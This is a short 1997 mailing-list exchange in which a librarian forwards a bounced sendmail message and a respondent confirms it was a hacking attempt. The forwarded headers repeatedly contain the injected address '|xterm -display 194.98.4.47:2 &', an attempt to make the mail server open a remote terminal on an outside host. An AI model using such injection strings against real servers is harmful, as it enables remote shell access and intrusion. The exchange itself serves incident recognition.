>
> I received the following message twice to the root account on one of my
> boxes. Does this look like a hacking attempt?
Yes. Definatly.
> ---------- Forwarded message ----------
> Date: Fri, 11 Jul 1997 18:42:56 -0400
> From: Mail Delivery Subsystem <MAILER-DAEMON @
libofmich .
lib .
mi .
us>
> To: MAILER-DAEMON @
libofmich .
lib .
mi .
us
> Subject: Returned mail: Unable to deliver mail
>
> ----- Transcript of session follows -----
> 554 qfAA31933: line 5: "|xterm -display 194.98.4.47:2 &"... Cannot mail directly to programs
>
> ----- Unsent message follows -----
> Received: from ts1-p08.dialup.iway.fr by libofmich.lib.mi.us
> id AA31933; Tue, 8 Jul 1997 18:12:55 -0400
> Date: Fri, 11 Jul 1997 18:31:32 -0400
> From: MAILER-DAEMON (Mail Delivery Subsystem)
> Subject: Returned mail: Unable to deliver mail
> Message-Id: <9707112231 .
AA31933 @
libofmich .
lib .
mi .
us>
> To: "|xterm -display 194.98.4.47:2 &"
>
> ----- Transcript of session follows -----
> 554 "|xterm -display 194.98.4.47:2 &" ... Cannot mail directly to programs
> 554 "|xterm -display 194.98.4.47:2 &"... Cannot mail directly to programs
>
> ----- Unsent message follows -----
> Received: from ts1-p08.dialup.iway.fr by libofmich.lib.mi.us
> id AA40892; Fri, 11 Jul 1997 18:31:32 -0400
> Date: Fri, 11 Jul 1997 18:31:32 -0400
> From: "|xterm -display 194.98.4.47:2 &"
> Message-Id: <9707112231 .
AA40892 @
libofmich .
lib .
mi .
us>
> Apparently-To: nobody
>
Arnaud.
--
Arnaud Girsch -+- Marben Products, Inc. / DSET Corporation - San Jose, CA
agirsch @
marben .
com -+- http://www.marben.com/ -+- http://www.dset.com/
References:
-
Possible hack
From: "Amy (Cremer) Briggs" <amyc @
libofmich .
lib .
mi .
us>
|
|
